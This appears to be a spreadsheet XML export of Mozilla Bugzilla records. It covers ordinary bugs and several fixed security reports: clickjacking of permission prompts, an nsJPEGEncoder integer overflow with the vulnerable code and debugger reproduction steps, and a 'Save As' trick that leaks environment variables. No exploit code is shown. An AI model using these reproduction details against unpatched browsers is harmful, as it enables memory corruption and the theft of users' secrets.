      <c r="K332" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L332" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M332" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N332" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O332" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P332" t="inlineStr"/>
      <c r="Q332" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R332" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S332" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T332" t="n">
        <v>1</v>
      </c>
      <c r="U332" t="n">
        <v>0</v>
      </c>
      <c r="V332" t="n">
        <v>39</v>
      </c>
      <c r="W332" t="inlineStr">
        <is>
          <t>Created attachment 8720900
Capture d’écran 2016-02-18 à 20.06.01.png
STR:
1 Open Panel
2 Join a room
3 Get message "no camera or microphone found"
Console log:
Empty string passed to getElementById(). remote-browser.xml:222:7
unreachable code after return statement sdk.js:11464:4
mutating the [[Prototype]] of an object will cause your code to run very slowly; instead create the object with the correct initial [[Prototype]] value using Object.create sdk.js:12164:3
The Components object is deprecated. It will soon be removed. utils.js:9:15
No stores registered for event type  metricsLogJoinRoom dispatcher.js:88:9
Security Error: Content at chrome://browser/skin/identity-secure.svg attempted to load chrome://browser/skin/identity-secure.svg#mask-clasp-cutout, but may not load external data when being used as an image.
mutating the [[Prototype]] of an object will cause your code to run very slowly; instead create the object with the correct initial [[Prototype]] value using Object.create application-e4a4d1bb98f0e8b3c62fce2ce19244e3.js:58598:35
OT.Publisher.onStreamAvailableError SourceUnavailableError: Unknown Error while getting user media sdk.js:31778:5
OT.exception :: title: Unable to Publish (1500) msg: GetUserMedia sdk.js:28806:3
POST 
https://loop-dev.stage.mozaws.net/v0/rooms/rm35P5Sg-7A [HTTP/1.1 400 Bad Request 159ms]
POST 
https://loop-dev.stage.mozaws.net/v0/rooms/rm35P5Sg-7A [HTTP/1.1 400 Bad Request 329ms]
POST 
https://loop-dev.stage.mozaws.net/v0/rooms/rm35P5Sg-7A [HTTP/1.1 400 Bad Request 425ms]
Loop:Loop hawkRequest error: Object { code: 400, errno: 203, error: "Unable to leave a room you have not…" } MozLoopService.jsm:706
Loop:Object { code: 400, errno: 203, error: "Unable to leave a room you have not…" } LoopRooms.jsm:818
Loop:Loop hawkRequest error: Object { code: 400, errno: 203, error: "Can't update status for a room you …" } MozLoopService.jsm:706
Loop:Loop hawkRequest error: Object { code: 400, errno: 203, error: "Can't update status for a room you …" } MozLoopService.jsm:706</t>
        </is>
      </c>
      <c r="X332" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="333">
      <c r="A333" t="n">
        <v>1041523</v>
      </c>
      <c r="B333" t="inlineStr">
        <is>
          <t>2014-07-21 06:42:29 -0700</t>
        </is>
      </c>
      <c r="C333" t="inlineStr">
        <is>
          <t>nag1.mktmon.services.phx1.mozilla.com:Disk - All is WARNING: DISK WARNING - free space: /data 19330 MB (9% inode=98%)</t>
        </is>
      </c>
      <c r="D333" t="inlineStr">
        <is>
          <t>2014-09-24 14:06:49 -0700</t>
        </is>
      </c>
      <c r="E333" t="n">
        <v>1</v>
      </c>
      <c r="F333" t="n">
        <v>1</v>
      </c>
      <c r="G333" t="n">
        <v>2</v>
      </c>
      <c r="H333" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I333" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J333" t="inlineStr">
        <is>
          <t>Operations: Marketplace</t>
        </is>
      </c>
      <c r="K333" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L333" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M333" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N333" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O333" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P333" t="inlineStr"/>
      <c r="Q333" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R333" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S333" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T333" t="n">
        <v>1</v>
      </c>
      <c r="U333" t="n">
        <v>0</v>
      </c>
      <c r="V333" t="n">
        <v>3</v>
      </c>
      <c r="W333" t="inlineStr">
        <is>
          <t>This is our monitoring host and it is running out of disk space.
The largest consumer of disk space is graphite, specifically
13G	/data/carbon/whisper/stats_counts/webpay/generic/transaction
103G	/data/carbon/whisper/stats/timers/webpay/generic/transaction
It looks like we are creating several whisper database per transaction. If we need this data we should probably reduce the retention period to reduce disk space.
Current retention period:
[longterm]
priority = 100
pattern = .*
retentions = 1m:30d,15m:3y
:kumar or :andym is this data needed? If so can we reduce the retention period for this data?</t>
        </is>
      </c>
      <c r="X333" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="334">
      <c r="A334" t="n">
        <v>1122387</v>
      </c>
      <c r="B334" t="inlineStr">
        <is>
          <t>2015-01-15 22:00:33 -0800</t>
        </is>
      </c>
      <c r="C334" t="inlineStr">
        <is>
          <t>MediaEngineWebRTCVideoSource::mSources is inadequately protected from non-threadsafe access</t>
        </is>
      </c>
      <c r="D334" t="inlineStr">
        <is>
          <t>2016-06-04 16:12:57 -0700</t>
        </is>
      </c>
      <c r="E334" t="n">
        <v>1</v>
      </c>
      <c r="F334" t="n">
        <v>1</v>
      </c>
      <c r="G334" t="n">
        <v>3</v>
      </c>
      <c r="H334" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I334" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J334" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K334" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L334" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M334" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N334" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O334" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P334" t="inlineStr">
        <is>
          <t>[adv-main36+]</t>
        </is>
      </c>
      <c r="Q334" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R334" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S334" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T334" t="n">
        <v>1</v>
      </c>
      <c r="U334" t="n">
        <v>0</v>
      </c>
      <c r="V334" t="n">
        <v>41</v>
      </c>
      <c r="W334" t="inlineStr">
        <is>
          <t>In trying to diagnose this failure:
https://treeherder.mozilla.org/logviewer.html#?job_id=5528186&amp;repo=mozilla-inbound
It appears that |mSources| must either be corrupt, or have been accessed from another thread. Neither of the places that write to it lock |mMonitor| first (although |Stop| locks it afterward), and we would expect to hit |Stop| when things are being torn down (where we see the failure above).
I have not determined why this started happening with the multistream push, but it may just be a matter of having more video tracks widening the window of opportunity.</t>
        </is>
      </c>
      <c r="X334" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="335">
      <c r="A335" t="n">
        <v>474950</v>
      </c>
      <c r="B335" t="inlineStr">
        <is>
          <t>2009-01-23 00:06:37 -0800</t>
        </is>
      </c>
      <c r="C335" t="inlineStr">
        <is>
          <t>logs of talos builds all look like they end with a networking problem</t>
        </is>
      </c>
      <c r="D335" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E335" t="n">
        <v>1</v>
      </c>
      <c r="F335" t="n">
        <v>1</v>
      </c>
      <c r="G335" t="n">
        <v>5</v>
      </c>
      <c r="H335" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I335" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J335" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K335" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L335" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M335" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N335" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O335" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P335" t="inlineStr"/>
      <c r="Q335" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R335" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S335" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T335" t="n">
        <v>1</v>
      </c>
      <c r="U335" t="n">
        <v>0</v>
      </c>
      <c r="V335" t="n">
        <v>22</v>
      </c>
      <c r="W335" t="inlineStr">
        <is>
          <t>The actual problem in bug 474915 went undetected by at least two people because they looked at the logs showing up on tinderbox and misinterpreted them, because talos runs now all end with:
Reached max number of runs before reboot required, restarting machine...
[Failure instance: Traceback (failure with no frames): twisted.internet.error.ConnectionLost: Connection to the other side was lost in a non-clean fashion.
]
The last bit there is the thing people expect when a networking problem causes a build to go orange, so these real crashes were dismissed as networking issues.
These logs should not end with this failure, since people look for the last failure in the log to see why a build went orange.</t>
        </is>
      </c>
      <c r="X335" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="336">
      <c r="A336" t="n">
        <v>1857430</v>
      </c>
      <c r="B336" t="inlineStr">
        <is>
          <t>2023-10-06 01:20:24 -0700</t>
        </is>
      </c>
      <c r="C336" t="inlineStr">
        <is>
          <t>Clickjacking of permission prompts for camera, microphone, geolocation via full screen</t>
        </is>
      </c>
      <c r="D336" t="inlineStr">
        <is>
          <t>2024-06-02 18:08:00 -0700</t>
        </is>
      </c>
      <c r="E336" t="n">
        <v>1</v>
      </c>
      <c r="F336" t="n">
        <v>1</v>
      </c>
      <c r="G336" t="n">
        <v>2</v>
      </c>
      <c r="H336" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I336" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J336" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K336" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L336" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M336" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N336" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O336" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P336" t="inlineStr">
        <is>
          <t>[adv-main120+][adv-esr115.5+][reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q336" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R336" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S336" t="inlineStr">
        <is>
          <t>121 Branch</t>
        </is>
      </c>
      <c r="T336" t="n">
        <v>1</v>
      </c>
      <c r="U336" t="n">
        <v>0</v>
      </c>
      <c r="V336" t="n">
        <v>42</v>
      </c>
      <c r="W336" t="inlineStr">
        <is>
          <t>Created attachment 9357003
video_2023-10-06_15-08-06.mp4
i found a vulnerability where user can fall for clickjacking to allow location permission
I tested on Firefox version 118.0.1 (64-bit)
steps to reproduce:
1. Open lock2-1-firefox.html
2. fastly move to the "do many clicks here" button.
3. Quickly click the "do many clicks here" button 6-7 times without moving the mouse then the location permission will be allowed
references : https://bugzilla.mozilla.org/show_bug.cgi?id=1826116</t>
        </is>
      </c>
      <c r="X336" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="337">
      <c r="A337" t="n">
        <v>1450353</v>
      </c>
      <c r="B337" t="inlineStr">
        <is>
          <t>2018-03-30 13:39:15 -0700</t>
        </is>
      </c>
      <c r="C337" t="inlineStr">
        <is>
          <t>Write and read beyond bounds caused by nsJPEGEncoder::emptyOutputBuffer()</t>
        </is>
      </c>
      <c r="D337" t="inlineStr">
        <is>
          <t>2024-05-30 09:44:30 -0700</t>
        </is>
      </c>
      <c r="E337" t="n">
        <v>1</v>
      </c>
      <c r="F337" t="n">
        <v>1</v>
      </c>
      <c r="G337" t="n">
        <v>3</v>
      </c>
      <c r="H337" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I337" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J337" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K337" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L337" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M337" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N337" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O337" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P337" t="inlineStr">
        <is>
          <t>[adv-main78+]</t>
        </is>
      </c>
      <c r="Q337" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R337" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S337" t="inlineStr">
        <is>
          <t>mozilla79</t>
        </is>
      </c>
      <c r="T337" t="n">
        <v>1</v>
      </c>
      <c r="U337" t="n">
        <v>0</v>
      </c>
      <c r="V337" t="n">
        <v>15</v>
      </c>
      <c r="W337" t="inlineStr">
        <is>
          <t>Created attachment 8964037
bug_1091_poc_3.htm
nsJPEGEncoder::emptyOutputBuffer (image\encoders\jpeg\nsJPEGEncoder.cpp) can experience an integer overflow. When it does, it causes compressed data (which can be derived from a script-provided image) to be written far beyond the end of its output buffer.
The bug is on line 433, which doesn't check for overflow.
This bug is similar to https://bugzilla.mozilla.org/show_bug.cgi?id=1434490 .
Attached is a POC that demonstrates the overflow and write beyond bounds.
If FF survives long enough to execute the lambda function in the |e.toBlob()| call in the POC, the script will then be able to read data from beyond bounds by reading the Blob, since that data comes from memory pointed to by |nsJPEGEncoder::mImageBuffer|. Often, however, FF dies reading beyond bounds while attempting to copy the buffer into the Blob, usually in NS_CopySegmentToBuffer().
420: boolean // static
421: nsJPEGEncoder::emptyOutputBuffer(jpeg_compress_struct* cinfo)
422: {
423:   nsJPEGEncoder* that = static_cast&lt;nsJPEGEncoder*&gt;(cinfo-&gt;client_data);
424:   NS_ASSERTION(that-&gt;mImageBuffer, "No buffer to empty!");
425: 
426:   // When we're reallocing the buffer we need to take the lock to ensure
427:   // that nobody is trying to read from the buffer we are destroying
428:   ReentrantMonitorAutoEnter autoEnter(that-&gt;mReentrantMonitor);
429: 
430:   that-&gt;mImageBufferUsed = that-&gt;mImageBufferSize;
431: 
432:   // expand buffer, just double size each time
433:   that-&gt;mImageBufferSize *= 2;
434: 
435:   uint8_t* newBuf = (uint8_t*)realloc(that-&gt;mImageBuffer,
436:                                       that-&gt;mImageBufferSize);
437:   if (!newBuf) {
438:     // can't resize, just zero (this will keep us from writing more)
439:     free(that-&gt;mImageBuffer);
440:     that-&gt;mImageBuffer = nullptr;
441:     that-&gt;mImageBufferSize = 0;
442:     that-&gt;mImageBufferUsed = 0;
443: 
444:     // This seems to be the only way to do errors through the JPEG library.  We
445:     // pass an nsresult masquerading as an int, which works because the
446:     // setjmp() caller casts it back.
447:     longjmp(((encoder_error_mgr*)(cinfo-&gt;err))-&gt;setjmp_buffer,
448:             static_cast&lt;int&gt;(NS_ERROR_OUT_OF_MEMORY));
449:   }
450:   that-&gt;mImageBuffer = newBuf;
451: 
452:   cinfo-&gt;dest-&gt;next_output_byte = &amp;that-&gt;mImageBuffer[that-&gt;mImageBufferUsed];
453:   cinfo-&gt;dest-&gt;free_in_buffer = that-&gt;mImageBufferSize - that-&gt;mImageBufferUsed;
454:   return 1;
455: }
Use the POC by starting FF, disabling D2D (if on Windows) (by setting gfx.direct2d.disable to |true|), and enabling large-surface support (c.f. https://bugzilla.mozilla.org/show_bug.cgi?id=1282074 ) by setting gfx.max-alloc-size == 2147483647 (0x7fffffff). Restart FF.
Now attach a debugger to FF and set a BP on line 433, above. Load the POC and wait for the BP at which the value of |that-&gt;mImageBufferSize| is 0x80000000. Now step line 433 and observe the overflow and subsequent allocation of a 0-length buffer for |newBuf| (and thus |mImageBuffer|, line 450) and the setting of the next writable buffer location (|next_output_byte|, line 452) to 0x80000000 beyond the end of the buffer.
Now set a BP on encode_one_block_simd() (in media\libjpeg\jchuff.c) and proceed. When you hit the BP, observe the function writing compressed image data into hyperspace at |state-&gt;next_output_byte|.
The POC generates random data that is generally uncompressible, and thus causes the JPEG compressor to generate a compressed data stream that is sufficiently-long to cause the overflow.</t>
        </is>
      </c>
      <c r="X337" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="338">
      <c r="A338" t="n">
        <v>1448544</v>
      </c>
      <c r="B338" t="inlineStr">
        <is>
          <t>2018-03-24 04:06:58 -0700</t>
        </is>
      </c>
      <c r="C338" t="inlineStr">
        <is>
          <t>bustage at xpcom/threads/SchedulerGroup.cpp:67:16: error: 'class mozilla::SchedulerGroup::Runnable' has no member named 'GetName' when Gecko 61 merges to Beta on 2018-04-26</t>
        </is>
      </c>
      <c r="D338" t="inlineStr">
        <is>
          <t>2018-04-08 10:21:49 -0700</t>
        </is>
      </c>
      <c r="E338" t="n">
        <v>1</v>
      </c>
      <c r="F338" t="n">
        <v>1</v>
      </c>
      <c r="G338" t="n">
        <v>3</v>
      </c>
      <c r="H338" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I338" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J338" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K338" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L338" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M338" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N338" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O338" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P338" t="inlineStr"/>
      <c r="Q338" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R338" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S338" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T338" t="n">
        <v>1</v>
      </c>
      <c r="U338" t="n">
        <v>0</v>
      </c>
      <c r="V338" t="n">
        <v>8</v>
      </c>
      <c r="W338" t="inlineStr">
        <is>
          <t>Regression from bug 1447744.
central-as-beta simulation: https://treeherder.mozilla.org/#/jobs?repo=try&amp;revision=7e9bf98b32fca04328de9b203435d2147c5798a9&amp;selectedJob=170035712
Failure log: https://treeherder.mozilla.org/logviewer.html#?job_id=170035689&amp;repo=try
[task 2018-03-24T10:34:04.899Z] 10:34:04     INFO -  In file included from /builds/worker/workspace/build/src/obj-firefox/xpcom/threads/Unified_cpp_xpcom_threads1.cpp:2:0:
[task 2018-03-24T10:34:04.900Z] 10:34:04     INFO -  /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp: In constructor '{anonymous}::AutoCollectVsyncTelemetry::AutoCollectVsyncTelemetry(mozilla::SchedulerGroup::Runnable*)':
[task 2018-03-24T10:34:04.900Z] 10:34:04     INFO -  /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:67:16: error: 'class mozilla::SchedulerGroup::Runnable' has no member named 'GetName'
[task 2018-03-24T10:34:04.900Z] 10:34:04     INFO -       aRunnable-&gt;GetName(mKey);
[task 2018-03-24T10:34:04.901Z] 10:34:04     INFO -                  ^~~~~~~
Once fixed, Linux and Windows opt will still be busted in beta simulations (bug 1448070).</t>
        </is>
      </c>
      <c r="X338" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="339">
      <c r="A339" t="n">
        <v>1817768</v>
      </c>
      <c r="B339" t="inlineStr">
        <is>
          <t>2023-02-20 03:19:59 -0800</t>
        </is>
      </c>
      <c r="C339" t="inlineStr">
        <is>
          <t>Vulnerability in Firefox 'Save As' Dialog Allows Attackers to Steal Environment Variables</t>
        </is>
      </c>
      <c r="D339" t="inlineStr">
        <is>
          <t>2024-05-30 11:05:35 -0700</t>
        </is>
      </c>
      <c r="E339" t="n">
        <v>1</v>
      </c>
      <c r="F339" t="n">
        <v>1</v>
      </c>
      <c r="G339" t="n">
        <v>2</v>
      </c>
      <c r="H339" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I339" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J339" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K339" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L339" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M339" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N339" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O339" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P339" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main111+][adv-esr102.9+]</t>
        </is>
      </c>
      <c r="Q339" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R339" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S339" t="inlineStr">
        <is>
          <t>112 Branch</t>
        </is>
      </c>
      <c r="T339" t="n">
        <v>1</v>
      </c>
      <c r="U339" t="n">
        <v>0</v>
      </c>
      <c r="V339" t="n">
        <v>18</v>
      </c>
      <c r="W339" t="inlineStr">
        <is>
          <t>Created attachment 9318706
poc.html
Normally, when a file is saved using the "Save As" dialog in the Firefox browser, the user is protected from different types of attacks by filtering out dangerous extensions or characters.
However, there is a remaining vulnerability where an attacker can place environment variables at the end of the file extension, which allows % signs to pass through without being filtered. An attacker can exploit this vulnerability to steal a victim's stored environment variable, such as various secret keys ( AWS, AZURE, Firebase, etc.),  or other tokens.
Steps to Reproduce:
This vulnerability works when a user has set the "Save As" dialog as the default download option (Settings → Files and Applications → Downloads → “Always ask you where to save files” is checked). Alternatively, an attacker could lure the victim into using the right-click download method, which always opens the "Save As" dialog for downloading a file.
1. Download and open the poc.html file in Firefox.
2. Download the file using one of the methods mentioned above on the poc.html page.
3. Upload the downloaded file to the poc.html page and observe that the secret is extracted (in this case, the username environment variable is used).
this vulnerability is similar to https://bugzilla.mozilla.org/show_bug.cgi?id=1765049 and https://bugs.chromium.org/p/chromium/issues/detail?id=1247389</t>
        </is>
      </c>
      <c r="X339" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="340">
      <c r="A340" t="n">
        <v>555109</v>
      </c>
      <c r="B340" t="inlineStr">
        <is>
          <t>2010-03-25 17:20:52 -0700</t>
        </is>
      </c>
      <c r="C340" t="inlineStr">
        <is>
          <t>Move wrappers to new scope even if their parent hasn't been moved yet (ZDI-CAN-761)</t>
        </is>
      </c>
      <c r="D340" t="inlineStr">
        <is>
          <t>2013-03-09 10:50:25 -0800</t>
        </is>
      </c>
      <c r="E340" t="n">
        <v>1</v>
      </c>
      <c r="F340" t="n">
        <v>1</v>
      </c>
      <c r="G340" t="n">
        <v>3</v>
      </c>
      <c r="H340" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I340" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J340" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K340" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L340" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M340" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N340" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O340" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P340" t="inlineStr">
        <is>
          <t>[sg:critical][keep hidden until 3.5.10 release] Pwn2Own 2010 bug</t>
        </is>
      </c>
      <c r="Q340" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R340" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S340" t="inlineStr">
        <is>
          <t>mozilla1.9.3a4</t>
        </is>
      </c>
      <c r="T340" t="n">
        <v>1</v>
      </c>
      <c r="U340" t="n">
        <v>0</v>
      </c>
      <c r="V340" t="n">
        <v>63</v>
      </c>
      <c r="W340" t="inlineStr">
        <is>
          <t>Placeholder for Pwn2Own bug found in Firefox at CanSecWest 2010 (CVE-2010-1121).</t>
        </is>
      </c>
      <c r="X340" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="341">
      <c r="A341" t="n">
        <v>437565</v>
      </c>
      <c r="B341" t="inlineStr">
        <is>
          <t>2008-06-05 22:21:43 -0700</t>
        </is>
      </c>
      <c r="C341" t="inlineStr">
        <is>
          <t>Crash [@ nsSpaceManager::GetPrevBand] with floats after nscoord_MAX of height</t>
        </is>
      </c>
      <c r="D341" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E341" t="n">
        <v>1</v>
      </c>
      <c r="F341" t="n">
        <v>1</v>
      </c>
      <c r="G341" t="n">
        <v>3</v>
      </c>
      <c r="H341" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I341" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J341" t="inlineStr">
        <is>
          <t>Layout: Floats</t>
        </is>
      </c>
      <c r="K341" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L341" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M341" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N341" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O341" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P341" t="inlineStr">
        <is>
          <t>[sg:critical?][fixed by 191448 (floatmgr re-write)]</t>
        </is>
      </c>
      <c r="Q341" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R341" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S341" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T341" t="n">
        <v>1</v>
      </c>
      <c r="U341" t="n">
        <v>0</v>
      </c>
      <c r="V341" t="n">
        <v>37</v>
      </c>
      <c r="W341" t="inlineStr">
        <is>
          <t>Created attachment 323993
testcase (crashes Firefox when loaded)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1a1pre) Gecko/2008053113 Minefield/3.1a1pre
Steps to reproduce:
1. Load the testcase in a debug build of Firefox.
Result:
###!!! ASSERTION: aBandRect should be first rect within its band: '!aBandRect || aBandRect == mBandList.Head() || aBandRect-&gt;Prev()-&gt;mBottom != aBandRect-&gt;mBottom', file /Users/jruderman/central/layout/generic/nsSpaceManager.h, line 475
Crash dereferencing 0xc0000017 (note the first digit -- this is not a null deref!)
The assertion also occurs in bug 410232, but that bug has a different testcase, no crash, and is public.</t>
        </is>
      </c>
      <c r="X341" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="342">
      <c r="A342" t="n">
        <v>1402704</v>
      </c>
      <c r="B342" t="inlineStr">
        <is>
          <t>2017-09-24 09:28:35 -0700</t>
        </is>
      </c>
      <c r="C342" t="inlineStr">
        <is>
          <t>Crash in OOM | large | NS_ABORT_OOM | nsTArray_base&lt;T&gt;::EnsureCapacity&lt;T&gt; | mozilla::layers::ScrollMetadata::ScrollMetadata</t>
        </is>
      </c>
      <c r="D342" t="inlineStr">
        <is>
          <t>2017-11-05 13:58:28 -0800</t>
        </is>
      </c>
      <c r="E342" t="n">
        <v>1</v>
      </c>
      <c r="F342" t="n">
        <v>1</v>
      </c>
      <c r="G342" t="n">
        <v>3</v>
      </c>
      <c r="H342" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I342" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J342" t="inlineStr">
        <is>
          <t>Graphics: WebRender</t>
        </is>
      </c>
      <c r="K342" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L342" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M342" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N342" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O342" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P342" t="inlineStr">
        <is>
          <t>[wr-mvp]</t>
        </is>
      </c>
